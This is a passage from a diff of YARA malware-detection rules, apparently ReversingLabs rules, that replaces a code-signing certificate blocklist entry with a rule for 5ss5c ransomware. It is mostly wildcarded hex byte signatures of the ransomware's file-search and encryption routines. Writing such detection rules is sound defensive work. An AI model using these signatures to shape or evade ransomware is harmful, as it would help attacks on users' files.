6A ?? FF 75 + ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B CF 8D 51 + } + $encrypt_files_2 = { + 8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 4D ?? + 89 4D ?? FF D3 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF D6 FF 75 ?? 8B F0 6A ?? 56 E8 ?? + ?? ?? ?? FF 75 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? FF 75 ?? 50 56 6A ?? 6A ?? + 6A ?? FF 75 ?? FF D3 8B F8 F7 DF 1B FF 23 FE 8B 35 ?? ?? ?? ?? 8B D7 8D 4A ?? 66 90 + 8A 02 42 84 C0 75 ?? 2B D1 8B CF E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 + C9 75 ?? 2B C2 57 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 81 3D ?? ?? ?? ?? ?? ?? + ?? ?? 0F 82 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files_3 = { + 55 8B EC 83 EC ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B C1 68 ?? ?? ?? ?? 50 + 89 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 0B C0 5F 8B E5 5D C3 53 6A ?? 57 FF + 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 8B D8 56 B8 ?? ?? + ?? ?? 6A ?? 3B D8 0F 47 D8 53 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? + 75 ?? 5E 5B 0B C0 5F 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B + 35 ?? ?? ?? ?? 89 45 ?? FF D6 57 FF D6 E8 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 05 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B F8 BE ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 + 05 ?? ?? ?? ?? 85 DB 74 + } + $encrypt_files_4 = { + 8A 0C 06 8D 40 ?? 30 48 ?? 83 EA ?? 75 ?? 8B CF E8 ?? ?? ?? ?? 8B F7 83 C7 ?? 83 EB + ?? 75 ?? 8B 45 ?? 0F 10 06 50 0F 11 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B F2 + } + $encrypt_files_5 = { + 66 8B 02 83 C2 ?? 66 85 C0 75 ?? BB ?? ?? ?? ?? 2B D6 8D 7B ?? 66 8B 47 ?? 83 C7 ?? + 66 85 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? 83 C3 ?? F3 A4 66 8B 43 ?? 83 C3 + ?? 66 85 C0 75 ?? 8B FB B9 ?? ?? ?? ?? 8B 5D ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5 + 53 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 35 ?? ?? ?? ?? 6A + ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? + 53 FF 15 ?? ?? ?? ?? 5E 5B 33 C0 5F 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VAS CO PTY LTD" and pe.signatures[i].serial=="02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" and 1579478400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($search_files_*)) and ( all of ($encrypt_files_*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_684F478C7259Dde0Cfe2260112Ca9846 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_5Ss5C : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects 5ss5c ransomware." author = "ReversingLabs" - id = "840af428-47e0-529e-9db9-8ab9c968f2e3" - date = "2023-11-08" - modified = "2023-11-08" + id = "c69f44de-8e48-518d-87bf-d21d11223a2f" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3996-L4012" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "59654ba1df27029a04ef3b1a1bb54f6c15b727f2013923a11a729752b8829743" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.5ss5c.yara#L1-L267" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "74fcec568906a01dade7091c63cffbe4afa49c4705d9c1f21d10b4eee655a805" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "5ss5c" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 89 BD ?? ?? ?? ?? 8B F1 + 8B 5D ?? 33 C0 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 6A ?? 89 45 ?? + 89 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 + ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? + 57 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D + ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? C7 00 ?? ?? ?? ?? C7 40 ?? + ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 + 45 ?? ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7 + 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 57 C0 8B 43 ?? 66 0F D6 + } + $find_files_p2 = { + 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C6 45 + ?? ?? 8B 3B 85 FF 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8B 47 ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 47 ?? 89 7D ?? E8 ?? ?? ?? ?? 6A + ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B + C8 74 ?? 83 78 ?? ?? 8D 48 ?? 72 ?? 8B 09 FF 70 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 + 50 FF 15 ?? ?? ?? ?? 8B C8 89 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8B D8 66 66 + 0F 1F 84 00 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? + 8B 8D ?? ?? ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C6 00 ?? 8D 41 ?? 83 79 ?? ?? 72 + ?? 8B 00 FF 71 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 8B D0 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 8D 85 ?? ?? ?? ?? 51 + 50 8B CA E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 F6 85 ?? + ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 FF FF B7 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 81 FF ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? + ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 83 CB ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 50 89 9D ?? ?? ?? ?? 89 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 + } + $find_files_p3 = { + 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 + ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 + 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? 83 7D ?? ?? 8D + 8D ?? ?? ?? ?? FF 75 ?? 0F 43 55 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B + 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? + 8B 5D ?? 8D 55 ?? 53 FF B5 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 85 ?? + ?? ?? ?? 8B 40 ?? 85 FF 0F 85 ?? ?? ?? ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? + 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 + ?? 0F 1F 80 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D + } + $find_files_p4 = { + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? + ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 + 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 + 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F + 43 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? + 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D + 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? + 8B FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D + ?? 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? + 8D 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 + } + $find_files_p5 = { + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 8D 55 ?? 83 7D ?? ?? 8B 4D ?? 0F 43 55 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 83 F9 ?? + 72 ?? 49 83 C8 ?? 3B C8 89 4D ?? 0F 42 C1 03 C2 0F 1F 40 ?? 80 38 ?? 75 ?? 0F B6 08 + 80 F9 ?? 75 ?? 33 C9 EB ?? 1B C9 83 C9 ?? 85 C9 74 ?? 3B C2 74 ?? 48 EB ?? 2B C2 EB + ?? 83 C8 ?? 6A ?? 8D 78 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C6 45 ?? ?? + 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? + ?? ?? 3B C7 0F 82 ?? ?? ?? ?? 2B C7 C7 45 ?? ?? ?? ?? ?? 83 C9 ?? 89 45 ?? 83 F8 ?? + 0F 42 C8 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 03 C7 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 8D ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + } + $find_files_p6 = { + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 07 + ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 47 + ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F 43 + 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 + DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D + ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B + FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? + 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D + 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? + 33 FF 66 66 0F 1F 84 00 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF B7 ?? ?? ?? ?? 0F 43 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? + ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 83 FF + ?? 72 ?? 8B 5D ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? + ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 + } + $find_files_p7 = { + 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01 + EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ?? + 50 8B CE E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 8D + ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 + 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01 + EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ?? + 50 8B CE E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? ?? ?? ?? 3B + } + $find_files_p8 = { + C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 + ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 74 ?? 8D 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 DB 8B 85 ?? + ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F + 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? + 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 + ?? 8B 01 85 C0 74 ?? 90 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01 + EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? E9 ?? + ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? + ?? ?? ?? 3B C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 75 ?? 8D + } + $find_files_p9 = { + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 + DB 8B 85 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? + C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? C6 45 ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? + ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? + F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B + 01 8B 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? + ?? E9 ?? ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? + ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? + 8B 01 85 C0 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B + } + $find_files_p10 = { + 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB + ?? 50 8B CE E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? + ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? + 75 ?? 33 FF 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F + 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B + 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 + } + $encrypt_files_p1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 55 8B 6C 24 ?? 56 8B + 74 24 ?? 57 8B 7C 24 ?? 85 F6 0F 8E ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? + 83 C4 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 + ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? + ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 4C 24 ?? 8B C1 + 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? + 83 C4 ?? 85 C0 75 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 